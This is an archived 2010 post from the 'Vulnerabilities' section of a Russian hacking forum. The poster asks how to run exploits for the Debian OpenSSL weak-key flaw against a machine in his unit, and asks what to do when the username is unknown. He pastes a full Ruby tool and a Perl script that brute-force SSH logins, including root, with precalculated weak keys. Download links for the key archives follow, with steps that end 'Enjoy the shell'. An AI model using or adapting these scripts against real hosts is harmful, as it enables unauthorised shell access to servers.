Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Обход ограничений безопасности в Debian

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> Обход ограничений безопасности в Debian
Имя
Сообщение << Старые топики   Новые топики >>
Обход ограничений безопасности в Debian - 2010-08-15 08:15:05.460000   
dude9999

Сообщений: 1
Оценки: 0
Присоединился: 2010-08-15 08:05:08.550000
Привет всем, есть потребность использовать эти скрипты…кто-нибудь их пробовал. У меня в подразделении есть машина,на котором есть данная уязвимость, только скрипт perl не понимаю как должен выполняться. Сделал всё как по инструкции, всё создал, дал права нужные и т.д. и т.п.
пытаюсь запустить скрипт под Ubuntu 10.04 в терминале,в итоге он думают пару секунд и больше ни какой инфы не даёт, ждал целый час в итоге насмотревшись в консоль решил обсудить…

А скрипт ruby я немного не понял,а именно вот эту строку "<user>" в
# debian_openssh_key_test.rb <host> <user> <keydir>

а если юзверя не знаешь?что делать?
плиззз подскажите как выполнить правильно..

#!/usr/bin/ruby # # Debian SSH Key Tester # L4teral &lt;l4teral [at] gmail com&gt; # # This tool helps to find user accounts with weak SSH keys # that should be regenerated with an unaffected version # of openssl. # # You will need the precalculated keys provided by HD Moore # See http://metasploit.com/users/hdm/tools/debian-openssl/ # for further information. # # Usage: # debian_openssh_key_test.rb &lt;host&gt; &lt;user&gt; &lt;keydir&gt; # require 'thread' THREADCOUNT = 10 KEYSPERCONNECT = 3 queue = Queue.new threads = [] keyfiles = [] host = ARGV.shift or raise "no host given!" user = ARGV.shift or raise "no user given!" keysdir = ARGV.shift or raise "no key dir given!" Dir.new(keysdir).each do |f| if f =~ /\d+$/ then keyfiles &lt;&lt; f queue &lt;&lt; f end end totalkeys = queue.length currentkey = 1 THREADCOUNT.times do |i| threads &lt;&lt; Thread.new(i) do |j| while !queue.empty? keys = [] KEYSPERCONNECT.times { keys &lt;&lt; queue.pop unless queue.empty? } keys.map! { |f| f = File.join(keysdir, f) } keys.each do |k| puts "testing key #{currentkey}/#{totalkeys} #{k}..." currentkey += 1 end system "ssh -l #{user} -o PasswordAuthentication=no -i #{keys.join(" -i ")} #{host} \"exit\" &amp;&gt;/dev/null" if $? == 0 then keys.each do |k| system "ssh -l #{user} -o PasswordAuthentication=no -i #{k} #{host} \"exit\" &amp;&gt;/dev/null" if $? == 0 then puts "KEYFILE FOUND: \n#{k}" exit end end end end end end trap("SIGINT") do threads.each { |t| t.exit() } exit end threads.each { |t| t.join }

the debian openssl issue leads that there are only 65.536 possible ssh keys generated, cause the only entropy is the pid of the process generating the key. This leads to that the following perl script can be used with the precalculated ssh keys to brute force the ssh login. It works if such a keys is installed on a non-patched debian or any other system manual configured to. On an unpatched system, which doesn't need to be debian, do the following: keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/ 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 2. Extract it to a directory 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 Bits, generated on an upatched debian (this is the key this exploit will break) 4. Run the perl script and give it the location to where you extracted the bzip2 mentioned. #!/usr/bin/perl my $keysPerConnect = 6; unless ($ARGV[1]) { print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n"; print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n"; print "By mm@deadbeef.de\n"; exit 0; } chdir($ARGV[0]); opendir(A, $ARGV[0]) || die("opendir"); while ($_ = readdir(A)) { chomp; next unless m,^\d+$,; push(@a, $_); if (scalar(@a) &gt; $keysPerConnect) { system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]); @a = (); } } 5. Enjoy the shell after some minutes (less than 20 minutes) Regards, Markus Mueller mm@deadbeef.de
Post #: 1
Страниц:  [1]
Все форумы >> [Уязвимости] >> Обход ограничений безопасности в Debian







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.